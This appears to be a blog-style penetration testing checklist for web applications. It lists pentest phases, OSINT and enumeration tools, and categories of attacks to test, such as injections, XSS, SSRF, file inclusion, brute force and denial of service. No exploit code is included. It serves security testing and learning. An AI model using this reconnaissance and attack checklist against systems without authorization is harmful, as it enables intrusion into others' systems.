I'm sharing "MY PENTEST CHECKLIST GUIDE" collection, which offers a wide range of prescriptive and arsenal of tools when considering or conducting a penetration test.
I would like to start off by saying, "Hacking isn't necessarily malicious and offensive, nor is it used for defensive purposes. IT IS A WORD. What that word implies to you may mean something different to another individual. For me, hacking first starts by hacking your mind. Remove doubt, disbelief, and a "just do it" attitude! POINT!"
MY PENTEST MOTTO: LET THESE QUOTES BE INSIGHTFUL TO YOU!
-
"Winning is not a sometime thing; it's an all-time thing. You don't win once in a while, you don't do things right once in a while, you do them right all the time. Winning is a habit. Unfortunately, so is losing." - Vince Lombardi
-
"Preception is a reality, only in your mind!" - Unknown
-
*"I never did give them hell. I just told the truth, and they thought it was hell." - Harry S. Truman
Using technologies for purposes unintended is the true essence of hacking for me. Penetration testing is a skill where you never stop learning and evolving. Reading and researching technology is a vital instrument for success when conducting penetration tests. Several elements to be mindful of during pentesting are methodologies, data capture, and reporting. This collection is divided into several sections based on experience and various research I gathered over the years. Consider how some components may be implemented in your CI/CD pipeline for long-term gains and benefits; just a thought.
The following are phases of penetration testing:
- Scoping and Pre-engagment interaction
- Intelligence gathering or OSINT
- Vulnerability analysis
- Threat Modeling
- Exploitation
- Post-exploitation
- Reporting
|-> Fingerprint Technologies
|-> Fingerprint Servers / Webservers
|-> Fingerprint Web Framework
|-> Fingerprint Web Application
|-> Stack Trace Analysis
|-> Conduct search engine discovery and reconnaissance
|-> Identify multiple versions/channels (web, mobile app, web services)
|-> Crawl webpages for keywords like passwords, tokens, dev environments
|-> Information Leakage, Leaked IDs, email addresses
|-> Spider / Web crawl for hidden content
|-> Seek content files like robots.txt, site.xml, .DS_Store, .js
|-> Identify co-hosted and related applications
|-> Identify application entry points
|-> Directory Enumeration Indexing
|-> Subdomains Enumeration
|-> Identify Firewalls and WAFs
| OSINT Tools consideration | ||
|---|---|---|
 Manually explore site |
Google Dorking |
~> Shodan |
| ~> BuiltWith |
~> Check corporate Github |
~> Maltego |
| ~> theHarvester |
~> Meta data & Info Leakage |
~> Search Social Media |
| ~> DarkSearch.io |
~> Searchcode |
~> Pastebin |
| ~> crunchbase.com |
||
| *Tool usages repositories coming soon! These aren't the only tools to explore, but it's a starting point |
|-> Perimeter and Infrastructure
|-> Cloud: ASN, FQDN, DNS, IP address
|-> Check ICMP packets allowed and DNS zone transfers
|-> Network Infrastructure Configurations
|-> Domains, Subdomains, Open ports with Shodan
|-> Port scan to all ports
|->Enumerate Servers, Webservers
|-> Enumerate Website ~> Enumerate Web Frameworks ~> Enumerate Web Applications
|-> Test SSL (testssl) Application Admin Interfaces
|-> Discovery of Hidden Resources > Files content exposure> robots.txt, sitemap.xml, .DS_Store
|-> `
|-> Code analysis ~> view page source code
|-> Stack Trace analysis ~> view network traffic
|-> view Github repo
|-> Analysis of error codes
|-> Check DMARC/SPF policies (spoofcheck)
| Enum Tools consideration | ||
|---|---|---|
| Manually explore site |
Nmap |
~> Shodan |
| ~> Amass |
~> GitHub scanning |
~> Maltego |
| ~> theHarvester |
~> Meta data & Info Leakage |
~> Search Social Media |
| ~> DarkSearch.io |
~> Searchcode |
~> Pastebin |
*Tool usages repositories coming soon! These aren't the only tools to explore, but it's a starting point
|-> Stack Trace analysis
- Default Credentials
- Credentials Transported over Encryption
- Database Access
- Broken Authentication |-> JSON Web Token Flaw
- Trace Redirects
- Check for old, backup and unreferenced files
- Test for policies (e.g. Flash, Silverlight, robots)
-
Test HTTP Security Headers Test for security HTTP headers (e.g. CSP, X-Frame-Options, HSTS) Check HTTP methods supported and Cross Site Tracing (XST) Test file extensions handling Test for non-production data in live environment, and vice-versa Check for sensitive data in client-side code (e.g. API keys, credentials) |-> Code analysis |-> Code entry point |-> Code Injection |-> Stack Trace analysis |-> HTTP Tampering |-> Cross Origin Resource Sharing
-
Application Admin Interface
-
Bypassing Authentication Schema User Testing: |-> User Registration Pdsrocess |-> Username Enumeration
-
Injection |-> HTML smuggling |-> HTML Injection |-> CSS Injection |-> XPath Injection |-> XML Injection |-> XXE XML External Entity |-> IMAP / STMP Injection |-> LDAP Injection
-
JavaScript Execution
-
XSS |-> Reflected |-> Stored |-> DOM base
-
Site Request Forgery |-> Cross Site Request Forgery (CSRF) |-> Server Site Request Forgery (SSRF) |-> Server-Side Template Injection |-> Remote Code Execution
- DB Injections |-> MySQL |-> PostGres |-> Oracle
- Account Enumeration or Guessable User Accounts
- Recover Sensitive Information
- Brute Force attack
- Query injections
-
Cookie atrributes
-
Session Management
-
Bypassing Session Management
-
Exposed Session Variables
-
Logout Session
-
Privilege Escalation
-
File Inclusions |-> RFI |-> LFI
-
File Upload |-> Upload unexpected file types |-> Upload malicious file types
|-> Hidden Directories
|-> Sensetive Files
- Fuzzing
- Denial of Services
This collection of resources has been some of my learning tools and the "how" and "why" this guide continues to grow.
OWASP Testing Guide v4
Web Application
Web Security Academy
OWASP-Testing-Guide-v5